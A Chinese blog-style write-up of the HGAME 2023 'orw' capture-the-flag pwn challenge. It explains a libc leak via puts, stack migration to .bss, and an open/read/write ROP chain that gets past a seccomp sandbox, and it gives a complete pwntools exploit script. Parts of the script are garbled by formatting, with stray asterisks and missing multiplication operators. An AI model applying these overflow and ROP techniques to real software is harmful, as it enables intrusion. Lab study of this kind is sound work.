0%

经典的orw题目

2024-03-27 12:15By
chhhh
栈迁移栈溢出PWN

Problem: [HGAME 2023 week1]orw

[[toc]]

思路

  • 解题大致思路
  • 没有 canary 没有pie 给了libc
    首先程序有一个溢出点 可以多溢出0x30个字节首先利用puts实现泄露libc
    得到libc基地址然后可以得到pop_rdx_ret 地址为后面orw做铺垫
    用ROPgadget得到pop_rdi_ret pop_rsi_r15_ret
    NSSIMAGE
    程序开了沙盒不能使用execve函数跟题目描述一样orw读取flag
    NSSIMAGE
    前面得到了libc基地址又给了libc所以直接得到open write read函数地址
    然后把orw写入bss段这里取的是0x404300 然后在rbp写入bss地址 调用read函数 这里要注意调用read函数时候要把rbp-0x100只后在给rsi因此此处rbp应该是0x404300 + 0x100
    NSSIMAGE
    exp在下面

EXP

  • 具体攻击代码
    #!/usr/bin/env python
    # coding=utf-8
    **from pwn import ***
    **from LibcSearcher import ***
    #io=remote('node5.anna.nssctf.cn',28955)
    context(log_level='debug',arch='amd64',os='linux')
    pwnfile = '../orw'
    io = process(pwnfile)

elf = ELF(pwnfile)
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
p_rdi = 0x401393
ret =0x40101a
pp_rsi_r15 = 0x401391
vuln = 0x4012C0
main = 0x4012F0
io.recvuntil(b'Maybe you can learn something about seccomp, before you try to solve this task.')
*payload = b'a'0x108 + p64(p_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
io.send(payload)
io.recvuntil(b'\n')
puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
success('puts_addr----->'+hex(puts_addr))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
p_rdx = libc_base + 0x0000000000142c92
oopen = libc_base + 0x10dce0
read = libc_base + 0x10dfc0
write = libc_base + 0x10e060
bss = 0x404300
gdb.attach(io)
call_read = 0x4012CF
io.recvuntil(b'Maybe you can learn something about seccomp, before you try to solve this task.')

*payload= b'a'0x100+p64(bss+0x100)+ p64(call_read)
io.send(payload)
#sleep(1)
leave_ret =0x4012EE
#gdb.attach(io)
*payload = b'/flag\0\0\0' + p64(p_rdi)+ p64(bss)+p64(pp_rsi_r15)+p64(0)2 +p64(p_rdx)+p64(0) + p64(oopen)
*payload += p64(p_rdi) + p64(3) + p64(pp_rsi_r15) + p64(bss)2 + p64(p_rdx) + p64(0x40) + p64(read)
*payload += p64(p_rdi) + p64(1) + p64(pp_rsi_r15) + p64(bss)2 + p64(p_rdx) + p64(0x40) + p64(write)
#io.recvuntil(b'Maybe you can learn something about seccomp, before you try to solve this task.')
payload = payload.ljust(0x100,b'a')
payload += p64(bss) + p64(leave_ret)
#io.recvuntil(b'Maybe you can learn something about seccomp, before you try to solve this task.')
io.sendline(payload)
io.interactive()

总结

  • 对该题的考点总结
    orw
还没有人赞赏,快来当第一个赞赏的人吧!
  
© 著作权归作者所有

加载中...

加载失败
广告
×
评论区
添加新评论

这个0x404300的地址是咋找出来的